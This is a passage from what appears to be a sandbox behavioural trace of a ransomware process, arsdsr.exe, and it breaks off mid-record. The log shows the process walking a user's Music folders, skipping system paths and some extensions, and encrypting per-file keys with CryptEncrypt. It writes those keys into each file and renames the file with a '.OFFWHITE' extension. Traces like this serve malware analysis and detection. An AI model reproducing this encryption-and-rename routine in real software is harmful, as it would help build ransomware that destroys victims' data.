lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fd8d110, ftCreationTime.dwHighDateTime=0x1d5e143, ftLastAccessTime.dwLowDateTime=0x9e9cd480, ftLastAccessTime.dwHighDateTime=0x1d5e5e4, ftLastWriteTime.dwLowDateTime=0x9e9cd480, ftLastWriteTime.dwHighDateTime=0x1d5e5e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName=".", cAlternateFileName="")) returned 0x544650 [0134.797] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.797] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fd8d110, ftCreationTime.dwHighDateTime=0x1d5e143, ftLastAccessTime.dwLowDateTime=0x9e9cd480, ftLastAccessTime.dwHighDateTime=0x1d5e5e4, ftLastWriteTime.dwLowDateTime=0x9e9cd480, ftLastWriteTime.dwHighDateTime=0x1d5e5e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="..", cAlternateFileName="")) returned 1 [0134.797] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.797] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.797] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7501260, ftCreationTime.dwHighDateTime=0x1d5dbd3, ftLastAccessTime.dwLowDateTime=0x2812ba70, ftLastAccessTime.dwHighDateTime=0x1d5e79f, ftLastWriteTime.dwLowDateTime=0x2812ba70, ftLastWriteTime.dwHighDateTime=0x1d5e79f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="S1XIz", cAlternateFileName="")) returned 1 [0134.797] lstrcmpiW (lpString1="S1XIz", lpString2=".") returned 1 [0134.797] lstrcmpiW (lpString1="S1XIz", lpString2="..") returned 1 [0134.797] lstrcmpiW (lpString1="S1XIz", lpString2="...") returned 1 [0134.797] lstrcmpiW (lpString1="S1XIz", lpString2="windows") returned -1 [0134.797] lstrcmpiW (lpString1="S1XIz", lpString2="$recycle.bin") returned 1 [0134.797] lstrcmpiW (lpString1="S1XIz", lpString2="rsa") returned 1 [0134.797] lstrcmpiW (lpString1="S1XIz", lpString2="ntuser.dat") returned 1 [0134.797] lstrcmpiW (lpString1="S1XIz", lpString2="programdata") returned 1 [0134.798] lstrcmpiW (lpString1="S1XIz", lpString2="appdata") returned 1 [0134.798] lstrcmpiW (lpString1="S1XIz", lpString2="program files") returned 1 [0134.798] lstrcmpiW (lpString1="S1XIz", lpString2="program files (x86)") returned 1 [0134.798] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\" [0134.798] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\", lpString2="S1XIz" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz" [0134.798] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.798] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.798] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\*.*" [0134.798] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7501260, ftCreationTime.dwHighDateTime=0x1d5dbd3, ftLastAccessTime.dwLowDateTime=0x2812ba70, ftLastAccessTime.dwHighDateTime=0x1d5e79f, ftLastWriteTime.dwLowDateTime=0x2812ba70, ftLastWriteTime.dwHighDateTime=0x1d5e79f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0134.800] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.800] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7501260, ftCreationTime.dwHighDateTime=0x1d5dbd3, ftLastAccessTime.dwLowDateTime=0x2812ba70, ftLastAccessTime.dwHighDateTime=0x1d5e79f, ftLastWriteTime.dwLowDateTime=0x2812ba70, ftLastWriteTime.dwHighDateTime=0x1d5e79f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0134.800] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.800] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.800] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea76e7e0, ftCreationTime.dwHighDateTime=0x1d5e11d, ftLastAccessTime.dwLowDateTime=0xe5434400, ftLastAccessTime.dwHighDateTime=0x1d5dcc0, ftLastWriteTime.dwLowDateTime=0xe5434400, ftLastWriteTime.dwHighDateTime=0x1d5dcc0, nFileSizeHigh=0x0, nFileSizeLow=0xe70f, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="-_yrUV40hG3synfu.m4a", cAlternateFileName="-_YRUV~1.M4A")) returned 1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2=".") returned 1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="..") returned 1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="...") returned 1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="windows") returned -1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="$recycle.bin") returned 1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="rsa") returned -1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="ntuser.dat") returned -1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="programdata") returned -1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="appdata") returned -1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="program files") returned -1 [0134.801] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="program files (x86)") returned -1 [0134.801] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.801] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="-_yrUV40hG3synfu.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a" [0134.801] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.801] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.801] PathFindExtensionW (pszPath="-_yrUV40hG3synfu.m4a") returned=".m4a" [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.801] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.802] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.802] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.802] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.802] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.802] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.802] lstrcmpiW (lpString1="-_yrUV40hG3synfu.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.802] GetProcessHeap () returned 0x500000 [0134.802] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5317c0 [0134.802] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\-_yruv40hg3synfu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0134.804] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=59151) returned 1 [0134.804] GetProcessHeap () returned 0x500000 [0134.804] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.804] GetProcessHeap () returned 0x500000 [0134.804] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.804] GetProcessHeap () returned 0x500000 [0134.804] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.804] GetProcessHeap () returned 0x500000 [0134.804] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.804] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.804] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.804] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.804] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.804] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.804] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.804] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.804] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.804] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d610*=0x100) returned 1 [0134.805] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.805] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.805] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x100) returned 1 [0134.805] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xe70f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.805] SetLastError (dwErrCode=0x0) [0134.805] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.807] GetLastError () returned 0x0 [0134.807] GetLastError () returned 0x0 [0134.807] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xe80f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.807] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.807] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xe90f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.808] WriteFile (in: hFile=0x214, lpBuffer=0x5317c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5317c0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0134.808] GetProcessHeap () returned 0x500000 [0134.808] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xe70f) returned 0x55b7c0 [0134.808] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.808] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0xe70f, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0xe70f, lpOverlapped=0x0) returned 1 [0134.812] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.812] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0xe70f, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0xe70f, lpOverlapped=0x0) returned 1 [0134.813] GetProcessHeap () returned 0x500000 [0134.813] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0134.813] CloseHandle (hObject=0x214) returned 1 [0134.814] GetProcessHeap () returned 0x500000 [0134.814] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.814] GetProcessHeap () returned 0x500000 [0134.815] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.815] GetProcessHeap () returned 0x500000 [0134.815] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.815] GetProcessHeap () returned 0x500000 [0134.815] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.815] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a" [0134.815] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a.OFFWHITE" [0134.815] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\-_yruv40hg3synfu.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\-_yrUV40hG3synfu.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\-_yruv40hg3synfu.m4a.offwhite")) returned 1 [0134.815] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d8cbfa0, ftCreationTime.dwHighDateTime=0x1d5e15a, ftLastAccessTime.dwLowDateTime=0x248efec0, ftLastAccessTime.dwHighDateTime=0x1d5e0f8, ftLastWriteTime.dwLowDateTime=0x248efec0, ftLastWriteTime.dwHighDateTime=0x1d5e0f8, nFileSizeHigh=0x0, nFileSizeLow=0x1093d, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="3IOizB8nYsB5PfsEK.mp3", cAlternateFileName="3IOIZB~1.MP3")) returned 1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2=".") returned 1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="..") returned 1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="...") returned 1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="windows") returned -1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="$recycle.bin") returned 1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="rsa") returned -1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="ntuser.dat") returned -1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="programdata") returned -1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="appdata") returned -1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="program files") returned -1 [0134.816] lstrcmpiW (lpString1="3IOizB8nYsB5PfsEK.mp3", lpString2="program files (x86)") returned -1 [0134.816] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.816] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="3IOizB8nYsB5PfsEK.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\3IOizB8nYsB5PfsEK.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\3IOizB8nYsB5PfsEK.mp3" [0134.816] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.816] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.816] PathFindExtensionW (pszPath="3IOizB8nYsB5PfsEK.mp3") returned=".mp3" [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0134.816] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0134.817] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0134.817] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0134.817] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b42a30, ftCreationTime.dwHighDateTime=0x1d5dca6, ftLastAccessTime.dwLowDateTime=0x9b3de850, ftLastAccessTime.dwHighDateTime=0x1d5d97e, ftLastWriteTime.dwLowDateTime=0x9b3de850, ftLastWriteTime.dwHighDateTime=0x1d5d97e, nFileSizeHigh=0x0, nFileSizeLow=0x127b5, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="43T09WZ_FEGR.m4a", cAlternateFileName="43T09W~1.M4A")) returned 1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2=".") returned 1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="..") returned 1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="...") returned 1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="windows") returned -1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="$recycle.bin") returned 1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="rsa") returned -1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="ntuser.dat") returned -1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="programdata") returned -1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="appdata") returned -1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="program files") returned -1 [0134.817] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="program files (x86)") returned -1 [0134.817] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.817] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="43T09WZ_FEGR.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a" [0134.817] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.817] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.817] PathFindExtensionW (pszPath="43T09WZ_FEGR.m4a") returned=".m4a" [0134.817] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.817] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.817] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.817] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.817] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.817] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.817] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.818] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.818] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.818] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.818] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.818] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.818] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.818] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.818] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.818] lstrcmpiW (lpString1="43T09WZ_FEGR.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.818] GetProcessHeap () returned 0x500000 [0134.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5317d0 [0134.818] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\43t09wz_fegr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0134.819] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=75701) returned 1 [0134.819] GetProcessHeap () returned 0x500000 [0134.819] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.819] GetProcessHeap () returned 0x500000 [0134.819] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.819] GetProcessHeap () returned 0x500000 [0134.819] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.819] GetProcessHeap () returned 0x500000 [0134.819] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.819] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.819] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.820] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.820] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.820] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d610*=0x100) returned 1 [0134.820] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.820] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.820] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0134.820] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x127b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.820] SetLastError (dwErrCode=0x0) [0134.820] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: 